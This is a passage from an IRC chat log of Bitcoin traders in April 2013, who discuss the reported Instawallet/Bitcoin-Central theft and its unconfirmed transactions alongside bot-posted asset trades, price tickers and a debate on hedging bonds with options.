23:05:19 and it's mostly on top of the head Apr 01 23:06:47 no wonder my 0.4BTC trsf from instawallet never materialized Apr 01 23:08:03 <_aeon> thanks Apr 01 23:08:10 <_aeon> it's nice to know i am not alone Apr 01 23:08:24 <_aeon> apparently it is something inducable Apr 01 23:08:33 <_aeon> which is what i'm most interested in now Apr 01 23:08:39 that's right... akin to that "sinking feeling" Apr 01 23:08:58 <_aeon> this, for example Apr 01 23:08:59 <_aeon> http://www.youtube.com/watch?v=2c_jOY89DVk&feature=youtu.be Apr 01 23:09:08 <_aeon> the marker on the paper noise does it somehow Apr 01 23:09:12 maybe it's and empathetic response? Apr 01 23:09:18 aeon, why yes, I do have that happening. Back of the head. Apr 01 23:09:19 never happend with music, usualy when learning something for me Apr 01 23:09:39 <_aeon> i'm amzed that i have just learned this Apr 01 23:10:26 oh ho ho Apr 01 23:10:26 http://blockchain.info/address/1LrPYjto3hsLzWJNstghuwdrQXB96KbrCy Apr 01 23:11:27 yeah - something is definately strange with this - has yet to confim at all - how could that be? Apr 01 23:11:44 ;;tslb Apr 01 23:11:53 Time since last block: 18 minutes and 17 seconds Apr 01 23:12:58 cnbc ticker says bitcoin at 4:40pm est Apr 01 23:13:19 on TV Apr 01 23:13:21 eh? Apr 01 23:14:01 pgp: no fees? Apr 01 23:14:11 c'mon Apr 01 23:14:27 it's got .1 BTC actually Apr 01 23:14:59 otru Apr 01 23:15:06 <_aeon> cnbc butthurt Apr 01 23:15:13 <_aeon> cramer's boss makes him talk about bitcoin Apr 01 23:15:20 cheapskates, if you asked me... Apr 01 23:15:37 yeah each of the tx's has .1 fee Apr 01 23:16:07 2013-04-01 17:44:51 Apr 01 23:16:12 UTC I assume? Apr 01 23:16:22 I think actually transacting with bitcoin is pretty broken Apr 01 23:17:00 in 23min Apr 01 23:17:04 $unconfirmed Apr 01 23:17:08 smickles: 1313 unconfirmed transactions. Oldest dated: 2013-03-30 16:07:38 Apr 01 23:17:14 wait a sec - doesn't the protocol permit the ability to book transactions in the future? Apr 01 23:17:20 yup Apr 01 23:17:28 and all other kind of fancy things Apr 01 23:17:50 also, it could be malformed, or made in such a way that no miners will pick it up, no matter what Apr 01 23:18:49 april fools joke? Apr 01 23:18:55 ^ Apr 01 23:19:01 its gotta be Apr 01 23:19:02 most likely, considering the day Apr 01 23:19:14 haha, fuq Apr 01 23:19:15 someone clever could do that with no fear Apr 01 23:19:26 fucked up, if you asked me... Apr 01 23:20:10 surely nobody is that stupid Apr 01 23:20:13 [BTCTC] [S.MPOE-PT] 30 @ 0.000639 = 0.0192 BTC [+] Apr 01 23:20:16 [BTCTC] [ASICMINER-PT] 1 @ 0.76 BTC [+] Apr 01 23:20:29 any easy way to test parseability of transaction Apr 01 23:20:34 I mean, its bitcoin so stupid is implied, but.. Apr 01 23:20:50 pgp: ask about it in -dev Apr 01 23:21:12 [BTCTC] [S.MPOE-PT] 80 @ 0.000639 = 0.0511 BTC [+] Apr 01 23:21:33 [BTCTC] [S.BBET-PT] 115 @ 0.00158 = 0.1817 BTC [+] Apr 01 23:21:50 got it... Apr 01 23:22:17 people already have Apr 01 23:22:21 ah Apr 01 23:22:22 they are being -dev Apr 01 23:22:31 so no answer Apr 01 23:22:33 and ignoring anything that makes them look like tards Apr 01 23:23:15 ;;ticker Apr 01 23:23:20 BTCUSD ticker | Best bid: 102.77500, Best ask: 103.77000, Bid-ask spread: 0.99500, Last trade: 102.77500, 24 hour volume: 81434.36555095, 24 hour low: 92.05000, 24 hour high: 105.99000, 24 hour vwap: 98.97011 Apr 01 23:23:43 pissing into the wind... Apr 01 23:24:21 would blockchain.info show the fancy parts of the protocol? or bad sigs, hashes, stuff like that? Apr 01 23:24:52 I mean, i could generate that tx, but my sig would be bad, but i could still broadcast it Apr 01 23:25:34 gmaxwell pointed out that at his node they are orphaned Apr 01 23:25:53 I think he's talking to goonie? Apr 01 23:26:45 dub: misfired hilight, he said Apr 01 23:27:05 also, at least one of those txns is relayed by blockchain itself Apr 01 23:28:25 [MPEX] [S.MPOE] 9450 @ 0.0006 = 5.67 BTC [-] Apr 01 23:30:04 and ignoring anything that makes them look like tards << this worked well for them so far. Apr 01 23:32:25 AM I reading that right? instawallet got cleaned out of 41,000 BTC? Apr 01 23:32:37 seems like it Apr 01 23:32:50 Txns won't confirm, but look bad... Apr 01 23:32:51 Bugpowder: but the tx hasn't confirmed for some reason Apr 01 23:33:01 forgot to send a fee? Apr 01 23:33:17 heh Apr 01 23:33:47 .1 x 3 BTC\ Apr 01 23:33:47 no hue fee is thwere. Apr 01 23:33:54 I had a transaction get stuck the other day for 12 hours, send from bitcoind ... there was no reason at all Apr 01 23:34:11 there is a .1 BTC fee on each of the two tx's: 996b0e98db80b20516313cd32920e7c8093a8a5bf1e1b1887747338a49052ce5 && 4cf56d0c1566778030095925328f4bc7ae988657bd62fe8bc05ac67302d32b4c Apr 01 23:34:24 maybe I'm just new arround here, but this seems really unsettling to me... Apr 01 23:35:01 Instawallet Cold Storage... Well then.... Either its not actually cold storage or its an inside job Apr 01 23:35:02 pgp: it's odd, to say the least Apr 01 23:35:27 Bugpowder: or a sick april fools joke with cleverly malformed txns Apr 01 23:35:33 Bitcoin-Central and Paytunia update: Our customer's bitcoins and euros are safe and will not be affected by the security breach. We have taken the websites off-line for proper investigation. The address 1LrPYjto3hsLzWJNstghuwdrQXB96KbrCy is under our exclusive control. Apr 01 23:35:34 ^^^ Apr 01 23:35:47 as smickles said Apr 01 23:35:48 is it possible they had the storage set up so you need multiple sigs Apr 01 23:35:56 dixit bitcoin-central.net Apr 01 23:35:56 and the attacker sent the tx with insufficient signaturing ? Apr 01 23:36:07 a nice then Apr 01 23:36:13 mircea_popescu: that could be! Apr 01 23:36:20 bitessak: oooh... link :)? Apr 01 23:36:31 bitcoin-central.net Apr 01 23:36:34 Oh. i see. well that helps bitessak Apr 01 23:36:38 mod6 could it ? Apr 01 23:36:49 i dunno if i understand the protocol enough to say Apr 01 23:37:08 right, but if they had that set up, that would have been a clever safeguard Apr 01 23:37:27 except the coin isnt at that address.. Apr 01 23:38:21 myeah. Apr 01 23:38:35 ok - let's assume for a moment that the txn is valid and like jbork say, just might take sometime to pick up... If they have yet to confirm, couldn't you convievebly beg large mining pools to exclude the txn for a little while until the "community" could opine on it? Apr 01 23:39:29 if a sufficient % of the miners agreed to not include it, it wouldn't confirm (odds are) for a while Apr 01 23:39:32 yes Apr 01 23:39:48 pgp no. Apr 01 23:39:58 that's such a huge breach of bitcoin security i don't even want to consider it. Apr 01 23:40:08 by no you mean, yes Apr 01 23:40:10 i'd certainly blacklist any miner doing such rap Apr 01 23:40:19 i think a lot of us would Apr 01 23:40:24 crap* Apr 01 23:40:41 and yet eligius has over a Th Apr 01 23:41:04 sooooo ? Apr 01 23:41:25 I understand, of course - just a thought experiment... Apr 01 23:41:35 deepbutt and guild have also helped luke with his shit or indicated willingness to do so in the past Apr 01 23:41:41 that is currently the main avenue of govt attacking bitcoin Apr 01 23:41:48 although deepbutt is no longer a threat Apr 01 23:41:53 and pretty much the only reason having miners chinese rather than american is good news. Apr 01 23:42:12 lol Apr 01 23:42:40 WTS G.SDICE,GSDPT,G.MPOE,G.BBET, BTCQuick and TU.Silver shares! Apr 01 23:43:00 [MPEX] [S.DICE] 1327 @ 0.00380105 = 5.044 BTC [+] Apr 01 23:43:07 lol Apr 01 23:43:11 dump all teh scams Apr 01 23:43:14 [MPEX] [S.DICE] 1500 @ 0.00398997 = 5.985 BTC [+] Apr 01 23:43:57 http://www.reddit.com/r/Bitcoin/comments/1bd1d1/i_think_i_just_lost_90btc_are_they_stolen_help/ << ouch Apr 01 23:44:06 [MPEX] [S.DICE] 179 @ 0.00398997 = 0.7142 BTC [+] Apr 01 23:44:35 dub such a hater! Apr 01 23:44:50 suddup you gyp Apr 01 23:45:44 (wow, that might look bad to someone who didn't see some of my conversations with tiberiusiv) Apr 01 23:48:59 lol Apr 01 23:51:15 [BTCTC] [S.MPOE-PT] 120 @ 0.000613 = 0.0736 BTC [-] Apr 01 23:51:42 it will look bad when these logs are read by the historians of bitcoin's formative years Apr 01 23:52:19 [BTCTC] [S.MPOE-PT] 50 @ 0.000612 = 0.0306 BTC [-] Apr 01 23:52:21 [BTCTC] [S.MPOE-PT] 330 @ 0.000611 = 0.2016 BTC [-] Apr 01 23:53:12 some people don't care Apr 01 23:53:45 chaangnoi for example shows up roaring drunk Apr 01 23:54:01 i otoh probably thank people too much Apr 01 23:55:42 also buttseks. Apr 01 23:56:19 https://bitcointalk.org/index.php?topic=159673.0;all Apr 01 23:56:23 this thread is kinda funnay. Apr 01 23:56:49 the CNBC segment on bitcoin was ok Apr 01 23:57:05 ThickAsThieves: not really Apr 01 23:57:09 they had the guy from Expensify defending and some trader thug attacking Apr 01 23:57:23 everyone said ignorant stuff Apr 01 23:57:30 too many buzzwords were thrown around Apr 01 23:58:00 its CNBS what do you expect? Apr 01 23:58:07 but what if COUNTERFEIT! Apr 01 23:58:19 motherfucking counterfeit bitcoins Apr 01 23:58:26 [BTCTC] [RSM] 3 @ 0.002399 = 0.0072 BTC [-] Apr 01 23:58:28 [BTCTC] [RSM] 197 @ 0.002012 = 0.3964 BTC [-] Apr 01 23:59:15 [BTCTC] [ASICMINER-PT] 1 @ 0.76 BTC [+] Apr 01 23:59:28 woah, google indexing people's wallets Apr 01 23:59:49 yeah srsly. Apr 02 00:00:16 that's like when they were indexing people's root pw a while ago, but worse Apr 02 00:00:46 you know... this is the disadvantge of having coders pretend they're ceos Apr 02 00:00:56 when disaster strikes there's nobody to coordinate corporate efforts Apr 02 00:01:00 because the ceo is busy coding. Apr 02 00:01:05 total fuckery. Apr 02 00:01:19 inb4 mpoe has legit ops Apr 02 00:01:29 that aside. Apr 02 00:01:44 The inexorable rise of the calls... mmm tastes good Apr 02 00:02:14 $vwap 101 Apr 02 00:02:15 smickles: An error has occurred and has been logged. Please contact this bot's administrator for more information. Apr 02 00:02:19 bah Apr 02 00:02:27 $vwap 102 Apr 02 00:02:29 smickles: An error has occurred and has been logged. Please contact this bot's administrator for more information. Apr 02 00:02:50 $vwap c102t Apr 02 00:02:52 smickles: An error has occurred and has been logged. Please contact this bot's administrator for more information. Apr 02 00:02:59 woah, something is actually wrong Apr 02 00:02:59 [HAVELOCK] [KCIM] 2 @ 1.0479 = 2.0958 BTC [+] Apr 02 00:04:44 >>[16:27] Man, all these people thinking I ran off with money. Kinda sad. 3 day outage and I'm a theif now. Apr 02 00:05:01 like avalons holiday or sumthn? Apr 02 00:06:14 his problem is more failing to address deprived's points than anything. Apr 02 00:06:26 ^ Apr 02 00:06:27 [MPEX] [O.USD.C101T] 5 @ 0.23024804 = 1.1512 BTC Apr 02 00:06:54 ding ding ding Apr 02 00:06:55 that aside, how can one man band take a 3 days off like dat Apr 02 00:07:03 its unserious Apr 02 00:11:08 $vwap 101 Apr 02 00:11:09 smickles: O.USD.C101T 1 day: average: 0.23024804 high: 0.23024804 low: 0.23024804 volume: 5 btc: 1.1512402 7 day: average: 0.23024804 high: 0.23024804 low: 0.23024804 volume: 5 btc: 1.1512402 30 day: average: 0.23024804 high: 0.23024804 low: 0.23024804 volume: 5 btc: 1.1512402 Apr 02 00:11:13 ha ha! Apr 02 00:11:24 noce Apr 02 00:11:58 ya know, i think i actually wanted to use depth, anyway :/ Apr 02 00:12:02 $depth 101 Apr 02 00:12:04 smickles: O.USD.P101N Bids: ['1000 @ 0.29751381'] Apr 02 00:12:05 smickles: Asks: ['1000 @ 0.45370856'] Apr 02 00:12:11 $depth c101T Apr 02 00:12:13 smickles: O.USD.C101T Bids: ['1000 @ 0.14333971'] Apr 02 00:12:14 smickles: Asks: ['1000 @ 0.23063909'] Apr 02 00:12:34 ;;calc 101/.77 Apr 02 00:12:34 131.168831169 Apr 02 00:13:48 we're chagin' 105 again? Apr 02 00:14:42 [MPEX] [S.MPOE] 8901 @ 0.00060554 = 5.3899 BTC [+] Apr 02 00:14:44 [MPEX] [S.MPOE] 7343 @ 0.00061415 = 4.5097 BTC [+] Apr 02 00:21:11 [MPEX] [X.IDIFF.JUN] 60 @ 0.158 = 9.48 BTC [+] Apr 02 00:22:39 ^ thoroughly reviled them, but decided to buy them... feels dirty now. Apr 02 00:22:59 Yay! Apr 02 00:23:10 u were selling? Apr 02 00:23:14 yep Apr 02 00:24:10 [BTCTC] [ASICMINER-PT] 5 @ 0.75 = 3.75 BTC [-] Apr 02 00:24:12 i believe the aren't diluted so much... but it's quite a shaky bet Apr 02 00:24:40 isnt man required payout below what you paid? Apr 02 00:24:44 max* Apr 02 00:24:57 or, min* Apr 02 00:25:01 you get the idea Apr 02 00:25:14 if they were generated after March closing, yes Apr 02 00:25:14 no, it's between 0.14 and 0.27 Apr 02 00:25:41 all IDIFFs ever generated averaged out Apr 02 00:26:21 o? Apr 02 00:26:25 at least i'll have a reason to annoy mp again if they fizzle out at 0.15 :D Apr 02 00:26:25 another thing i did not know Apr 02 00:26:32 hehe Apr 02 00:26:57 I discussed this at great length 6 months ago with mp, I forget Apr 02 00:27:11 I guess that limits my downside Apr 02 00:27:16 Apr 02 00:27:37 mp said clearly they are one asset ... so i believe all collateral is put together Apr 02 00:27:59 my understanding was opposite Apr 02 00:28:01 but Apr 02 00:28:11 things may have changed / I don't quite recall Apr 02 00:28:12 [MPEX] [O.USD.C086T] 15 @ 0.31307618 = 4.6961 BTC Apr 02 00:28:53 ;;calc 86/(1-0.31307618) Apr 02 00:28:54 125.195833215 Apr 02 00:29:03 doing my smickled impression Apr 02 00:29:12 :) Apr 02 00:29:18 smickles* Apr 02 00:31:06 lets do dis Apr 02 00:31:24 bidwall @ 103 Apr 02 00:31:48 [MPEX] [O.USD.C086T] 15 @ 0.31309453 = 4.6964 BTC [+] Apr 02 00:32:59 [MPEX] [O.USD.C086T] 25 @ 0.31309453 = 7.8274 BTC [+] Apr 02 00:33:51 for people of your resources, yes Apr 02 00:34:00 heh Apr 02 00:34:16 ZING Apr 02 00:34:33 ASKWALL AT 104 Apr 02 00:34:37 clash of the titans Apr 02 00:34:41 400 BTC Apr 02 00:34:43 is that tiberius getting zinged, or did i do somehting dumb again? Apr 02 00:34:43 .selfnote. Apr 02 00:36:29 ThickAsThieves: i think it was part of the play-by-play on the walls Apr 02 00:36:49 [MPEX] [O.USD.C101T] 25 @ 0.23064781 = 5.7662 BTC [+] Apr 02 00:36:56 also, this not being able to accurately predict how many puts i'll get out of a SPLIT is f-ing killing me Apr 02 00:36:57 word Apr 02 00:37:26 yeah Apr 02 00:37:30 I thought that I had just given up on it when i put in a 10% wiggle room Apr 02 00:37:31 that is annoying Apr 02 00:37:35 but it's not enough Apr 02 00:37:44 how freaking hard is it to just publish the actual formula? Apr 02 00:37:59 Does that reveal too much about the mpoebot pricing algo? Apr 02 00:38:01 ostensibly impossible Apr 02 00:38:43 Bugpowder: well, it would reveal his account of the volatility, since he's said it has to do with volatility based insurance Apr 02 00:38:44 maybe there could be a scaling index on the mpex site that you could use to calculate the estimate Apr 02 00:38:47 https://bitcointalk.org/index.php?topic=164143.msg1717621#msg1717621 Apr 02 00:38:58 here's explanation for non inclusion of instawallet txs Apr 02 00:40:17 so is this related to the founder's reported breach? Apr 02 00:40:24 https://bitcointalk.org/index.php?topic=164143.msg1717686#msg1717686 << lends promise to the newbs Apr 02 00:42:22 not clearly. Apr 02 00:43:17 http://trilema.com/2013/path-of-exile-story-continued/ Apr 02 00:43:35 stuff to do when you're sick. have toes suckled, play poe, jasmin tea... Apr 02 00:44:31 aw, crap. I'm going to give that a try now, i suppose Apr 02 00:44:57 the toes thing always makes me giggle Apr 02 00:44:59 [HAVELOCK] [KCIM] 2 @ 1.09 = 2.18 BTC [+] Apr 02 00:45:19 it's too hard to do surriousface while my toes are getting tongued Apr 02 00:46:10 well, one of -assets core denizens just failed to notice options renaming and freaked out Apr 02 00:46:45 i'll rather keep his name secret to prevent embarrassment Apr 02 00:46:48 mp have you ever fucked around with dwarf fortress? Apr 02 00:46:58 fun game Apr 02 00:47:31 mah ***** smicks Apr 02 00:48:32 is that like nethack? Apr 02 00:49:21 benkay nope no idea what that is Apr 02 00:49:48 benkay well we're not all little bishes you know :D Apr 02 00:49:57 naff naff naff Apr 02 00:50:11 strong similarities to nethack Apr 02 00:50:15 procedural worldgen Apr 02 00:50:17 @Mircea_Popescu 13m @JessicaKRoy Strippers everywhere have been doing this for many many years. Apr 02 00:50:24 Jessica Roy favorited your Tweet Apr 02 00:50:39 @JessicaKRoy 10m @Mircea_Popescu Is that you in your Twitter background?? Apr 02 00:50:40 featuring "adventurer" mode and "fortress" modes Apr 02 00:50:53 @Mircea_Popescu 8m @JessicaKRoy Yeah. Apr 02 00:50:56 Jessica Roy favorited your Tweet Apr 02 00:51:10 chick's struck eh. Apr 02 00:53:43 she must be Apr 02 00:55:03 or she's playing twitter the same way you play poe. Apr 02 00:55:22 ziggap is down the drain in value Apr 02 00:55:51 [MPEX] [S.MPOE] 8700 @ 0.0006 = 5.22 BTC [-] Apr 02 00:55:57 hah Apr 02 00:56:03 ding ding ding Apr 02 00:57:47 sorta feels like 105 might be going shortly Apr 02 01:02:59 [HAVELOCK] [SDICE] 1 @ 0.40989999 BTC [-] Apr 02 01:06:31 yep Apr 02 01:08:47 ROLL TIDE! Apr 02 01:09:30 BTC... stahp! Apr 02 01:10:25 at this rate BTC either replaces other currencies or makes the msot epic crash ever... Apr 02 01:11:13 or some where in between :) Apr 02 01:11:36 aaand $2 Apr 02 01:12:10 ;;seen smickles Apr 02 01:12:10 smickles was last seen in #bitcoin-assets 25 minutes and 12 seconds ago: fun game Apr 02 01:12:16 ;;ticker Apr 02 01:12:22 BTCUSD ticker | Best bid: 105.48528, Best ask: 105.99000, Bid-ask spread: 0.50472, Last trade: 105.48528, 24 hour volume: 85532.71774427, 24 hour low: 92.20000, 24 hour high: 105.99000, 24 hour vwap: 99.52134 Apr 02 01:12:23 !ticker ^oix Apr 02 01:12:23 These beans is shit. Apr 02 01:12:30 !ticker m ^oix Apr 02 01:12:31 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 86.04499804 / 100.46060009 / 132.19053746 (9160 shares, 4,506.96 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Apr 02 01:12:41 :D Apr 02 01:12:42 at this rate in like 5 weeks we're at infinite USD/BTC Apr 02 01:12:56 No just until demand shuts off Apr 02 01:13:17 In order support a full economy BTC requires 1000-5000 USD per coin Apr 02 01:13:46 good... Apr 02 01:19:01 [MPEX] [S.BBET] 10000 @ 0.00201393 = 20.1393 BTC [-] Apr 02 01:19:09 [MPEX] [S.BBET] 5000 @ 0.00201394 = 10.0697 BTC [+] Apr 02 01:19:12 Oh wow Apr 02 01:19:16 Go bbet Apr 02 01:19:25 !ticker H HIM Apr 02 01:19:27 [HAVELOCK:HIM] 1D: 2.06000000 / 2.06 / 2.06000000 (2 shares, 4.12000000 BTC), 7D: 1.41000000 / 1.79268326 / 2.08000000 (215 shares, 385.42689996 BTC), 30D: 1.40000000 / 1.78615393 / 2.08000000 (739 shares, 1319.96775265 BTC) Apr 02 01:22:14 [BTCTC] [ASICMINER-PT] 1 @ 0.75 BTC [-] Apr 02 01:22:21 cool Apr 02 01:22:44 [BTCTC] [ASICMINER-PT] 2 @ 0.749999 = 1.5 BTC [-] Apr 02 01:22:49 mi Apr 02 01:23:17 [BTCTC] [ASICMINER-PT] 1 @ 0.741 BTC [-] Apr 02 01:23:52 mircea_popescu i think you have provided an opportunity given you don't hedge Apr 02 01:24:13 smickles: pong. redirect help to list you want? Apr 02 01:24:47 Someone could provide bondholders a service to hedge their risks Apr 02 01:24:48 [BTCTC] [ESECURITYSABTC] 1 @ 0.25103 BTC [-] Apr 02 01:24:51 [BTCTC] [ESECURITYSABTC] 1 @ 0.25103 BTC [-] Apr 02 01:25:08 thestringpuller how'd that work ? Apr 02 01:27:09 [BTCTC] [ASICMINER-PT] 5 @ 0.735 = 3.675 BTC [-] Apr 02 01:27:43 [BTCTC] [ASICMINER-PT] 1 @ 0.736 BTC [+] Apr 02 01:27:46 [BTCTC] [ASICMINER-PT] 3 @ 0.7301 = 2.1903 BTC [-] Apr 02 01:28:22 [BTCTC] [ASICMINER-PT] 1 @ 0.7301 BTC [-] Apr 02 01:28:45 [BTCTC] [ASICMINER-PT] 1 @ 0.73 BTC [-] Apr 02 01:30:20 [BTCTC] [BTC-BOND] 1 @ 0.00999 BTC [-] Apr 02 01:30:22 [BTCTC] [BTC-BOND] 6 @ 0.0099 = 0.0594 BTC [-] Apr 02 01:30:35 [BTCTC] [BTC-BOND] 19 @ 0.0099 = 0.1881 BTC [-] Apr 02 01:30:50 [BTCTC] [ASICMINER-PT] 1 @ 0.726 BTC [-] Apr 02 01:30:56 [BTCTC] [ASICMINER-PT] 2 @ 0.726 = 1.452 BTC [-] Apr 02 01:31:20 [BTCTC] [ASICMINER-PT] 5 @ 0.725 = 3.625 BTC [-] Apr 02 01:31:28 mircea_popescu : since mpoe is like "ground" in that option hedges flow to it, one could provide a second tier of insurance to the bondholders. Essentially cutting up the exposure and selling it off... Apr 02 01:31:38 [BTCTC] [ASICMINER-PT] 1 @ 0.7241 BTC [-] Apr 02 01:31:50 But at the bondholders discretion, not MPOE Apr 02 01:32:32 [BTCTC] [BITVPS] 1 @ 0.00401 BTC [-] Apr 02 01:32:40 [BTCTC] [BITVPS] 100 @ 0.004 = 0.4 BTC [-] Apr 02 01:32:45 [BTCTC] [BITVPS] 100 @ 0.004 = 0.4 BTC [-] Apr 02 01:32:48 at this rate SD will be over 4 million bets tomorrow Apr 02 01:32:57 total all time Apr 02 01:33:23 these last 3 bbet trades were particularly derpy... inb 3 coinbr users Apr 02 01:33:35 !ticker m S.DICE Apr 02 01:33:36 [MPEX:S.DICE] 1D: 0.0031 / 0.00346482 / 0.00419788 (71207 shares, 246.72 BTC), 7D: 0.0031 / 0.00332803 / 0.0045 (705238 shares, 2,347.06 BTC), 30D: 0.00300001 / 0.00433193 / 0.006225 (1671034 shares, 7,238.81 BTC) Apr 02 01:33:59 [BTCTC] [ASICMINER-PT] 1 @ 0.7231 BTC [-] Apr 02 01:34:12 [BTCTC] [ASICMINER-PT] 10 @ 0.7222 = 7.222 BTC [-] Apr 02 01:34:47 [BTCTC] [ASICMINER-PT] 1 @ 0.722 BTC [-] Apr 02 01:34:50 [BTCTC] [ASICMINER-PT] 1 @ 0.7212 BTC [-] Apr 02 01:36:16 [MPEX] [S.DICE] 2800 @ 0.00389 = 10.892 BTC [-] Apr 02 01:36:36 this clit is both malformed and unresponsive Apr 02 01:37:05 sounds like a waste of time Apr 02 01:37:16 I yearn for another kind of clit Apr 02 01:37:39 I AM THE CLIT COMMANDER Apr 02 01:38:01 this toshiba clit is too small, rough to the touch and blue Apr 02 01:38:51 whereas my stinkpad clit is bigger, flatter and more correctly hued Apr 02 01:40:09 also clit use in general is painful without a scroll button Apr 02 01:40:58 [BTCTC] [BTC-BOND] 5 @ 0.01 = 0.05 BTC [+] Apr 02 01:44:39 CoinBr referrals paid out and monthly fee levied. Apr 02 01:44:53 Monthly fee was halved due to March problems. Apr 02 01:45:29 mod6 we need to talk Apr 02 01:45:34 ;;seen mod6 Apr 02 01:45:34 mod6 was last seen in #bitcoin-assets 7 minutes and 55 seconds ago: I AM THE CLIT COMMANDER Apr 02 01:49:55 thestringpuller, I think S.MPOE moves quite independently from the bonds, no? Apr 02 01:50:06 Mpoe the bot Apr 02 01:51:30 then i don't understand what you have in mind Apr 02 01:52:13 Bondholders have nothing to hedge their bets against Apr 02 01:52:38 So provide a service that buys mpoe bonds essentially at some price if things go bad Apr 02 01:53:38 and who will eat the loss then? Apr 02 01:53:54 The service Apr 02 01:54:22 That's their job. Internally they can cover the losses anyway they see fit. Apr 02 01:54:49 Via another asset that paid off or some other revenue stream Apr 02 01:55:08 still i don't get it. MPOE is obliged to pay out exercises, not "as it sees fit" Apr 02 01:55:22 No no you misunderstand Apr 02 01:55:29 Mpoe keeps doing what its doing Apr 02 01:56:07 Bond holders however can sell their stake to some service who specializes in hedging. For when things go awry Apr 02 01:56:40 Bondholders have no way to exit their position if things go bad Apr 02 01:56:57 perhaps it would be best to explain on practical example of MPBPT Apr 02 01:57:38 so , if you were tahat service, you'll place a bid at, say, 0.09 (nominal value is 0.1)? Apr 02 01:57:46 Yes Apr 02 01:58:03 and how would you recover it? Apr 02 01:58:45 Diversification or other parts of the portfolio. You make some revenue from the 10% under bid. Apr 02 01:59:02 The same way an insurance company covers losses... Apr 02 01:59:11 Its just a brainstorm Apr 02 02:00:25 there were actually some such bids Apr 02 02:00:31 MPOE passes exposure to bondholders, bondholders should be able to pass exposure to another party Apr 02 02:00:50 Particular a party equipped to recover losses Apr 02 02:00:55 Particularly* Apr 02 02:02:18 i already advised bondholders to hedge using options (and i actually did myself) Apr 02 02:02:53 ;;seen mod6 Apr 02 02:02:53 mod6 was last seen in #bitcoin-assets 25 minutes and 14 seconds ago: I AM THE CLIT COMMANDER Apr 02 02:02:54 don't see any other possibility, since btc price can exceed any independent hedge Apr 02 02:03:16 mod6 is commanding clit, don't disturb Apr 02 02:03:41 ... so the best hedge is to put something into mpoe's other end Apr 02 02:04:03 jurov lets take an insurance examole Apr 02 02:04:40 insurance usually doesn't deal with 300% increase in a month... Apr 02 02:04:43 Lets say a legit BTC insurance company exist using a reserve-invest model Apr 02 02:05:01 This company would have other policies, not just options Apr 02 02:05:17 [BTCTC] [ASICMINER-PT] 1 @ 0.759 BTC [+] Apr 02 02:05:39 If writing options are bad one month, perhaps there was drought so there were 0 flood insurance claims Apr 02 02:06:03 Instead of limiting exposure you diversify Apr 02 02:06:28 then it's diversification, not a hedge Apr 02 02:06:55 Yes. But to the bondholder it would be. Apr 02 02:07:02 In his eyes Apr 02 02:07:08 It would stop losses. Apr 02 02:07:14 Or minimize Apr 02 02:07:20 Insuring the insurer so to speak... Apr 02 02:07:51 well, so if it was 50% bonds / 50% something else Apr 02 02:07:59 Yes. Apr 02 02:08:10 what made 20% in March to offset bonds loss? Apr 02 02:08:29 only MPOE call options afaik. Apr 02 02:09:11 or maybe shorting ziggap, lol Apr 02 02:09:27 A lot of things outside bitcoins. But your point is clear Apr 02 02:09:31 Poor ziggap Apr 02 02:10:13 $vwap ^ Apr 02 02:10:15 smickles: ^OIX 1 day: no data 7 day: average: 100.46060009 high: 132.19053746 low: 86.04499804 volume: 9160 btc: 4506.96446122 30 day: no data Apr 02 02:10:23 My scenario is hypothetical and in a world where btc services are more developed, vis-a-vis, a btc insurance company Apr 02 02:10:29 Bbl Apr 02 02:11:49 Actually, I think we're onto something here for someone who has the balls. Apr 02 02:12:04 Since MPOE options can provide roughly 5x leverage as MP wrote Apr 02 02:12:41 a fund that invests 60% into bonds, 20% into calls, 20% into puts Apr 02 02:13:16 ... well, that needs quality time with spreadsheet. Apr 02 02:13:27 jurov: i don't think mpbor are a good investment Apr 02 02:14:40 in case you missed it http://www.youtube.com/watch?feature=player_embedded&v=y1POVoi9NPk Apr 02 02:15:08 smickles, care to elaborate? Apr 02 02:21:07 whoa ltc at .0184 Apr 02 02:24:00 jurov: i don't like the limited gain with unlimited loss, and the delay of moving into and out of it. maybe i should look at the coinbr offering on bitfunder Apr 02 02:24:13 ThickAsThieves: thanks for that link :) Apr 02 02:24:59 o, CoinBr.MPBPT-* link is the raw thing, just sliced to 0.1BTC parts. Apr 02 02:27:59 [HAVELOCK] [VTX] 10 @ 0.53 = 5.3 BTC [-] Apr 02 02:28:10 if i found a way to improve it, i'd certainly spam it around everywhere :D Apr 02 02:29:10 hmmm http://bitbet.us/bet/297/litecoin-surges-to-02-bitcoins-per-litecoin/ Apr 02 02:29:51 smickles, if MPBPT would be redirected to soebot instead, would you know how to limit possible loss? Apr 02 02:29:59 [HAVELOCK] [VTX] 5 @ 0.511 = 2.555 BTC [-] Apr 02 02:30:00 [HAVELOCK] [VTX] 2 @ 0.509 = 1.018 BTC [-] Apr 02 02:30:01 [HAVELOCK] [VTX] 1 @ 0.505 BTC [-] Apr 02 02:30:22 jurov: could i not buy it and sell it partway thru the month tho? Apr 02 02:30:55 suppose that yes. Apr 02 02:31:26 you would be able to buy/sell against MPBPT orderbook on BF Apr 02 02:31:37 that's a bit of an improvement there Apr 02 02:31:44 how so? Apr 02 02:31:48 soebot isn't ready for primetime yet Apr 02 02:32:24 well, part of the problem with mpbor is that it takes so long to enter and exit positions on it Apr 02 02:32:47 one could've seen this recent loss coming before anyone else, and not been able to do anything about it Apr 02 02:33:18 that's problem inherent to mpex.. so that cover must be kept until the end of the month Apr 02 02:33:34 but if you had mpbpt instead, there is at least the possibility of selling when you see a bad cloud Apr 02 02:34:12 yea, some sold at 0.9, that is possible already Apr 02 02:34:26 but i'm asking how the bot comes to picture Apr 02 02:34:43 interaacting with bf order book Apr 02 02:35:00 how come that scammy nvc is trading higher than ltc Apr 02 02:35:16 i cant make sense of it Apr 02 02:35:52 and i'd like to take funding for for soebot, since most of the time it just sits there and says, I need more X Apr 02 02:36:27 but there are still, even now things to be sorted out with mpex interaction Apr 02 02:36:45 hahaha, i *so* know Apr 02 02:36:51 these things Apr 02 02:37:25 hm Apr 02 02:37:30 apparently its a russian thing Apr 02 02:37:32 so far this month, i've put at least 24 btc to surety for absoluty nothing Apr 02 02:38:11 "1.0 BTC for 0 O.USD.P086T" Apr 02 02:38:12 smickles, if you can't afford to license coinbr code, maybe we can think about alphatesting an api Apr 02 02:38:19 kinda funny how many of those i have Apr 02 02:38:58 [HAVELOCK] [SDICE] 1 @ 0.44499999 BTC [+] Apr 02 02:38:59 jurov: so you know the volatility impact on SPLIT insurance addition to strike/spot? Apr 02 02:39:45 ah, not 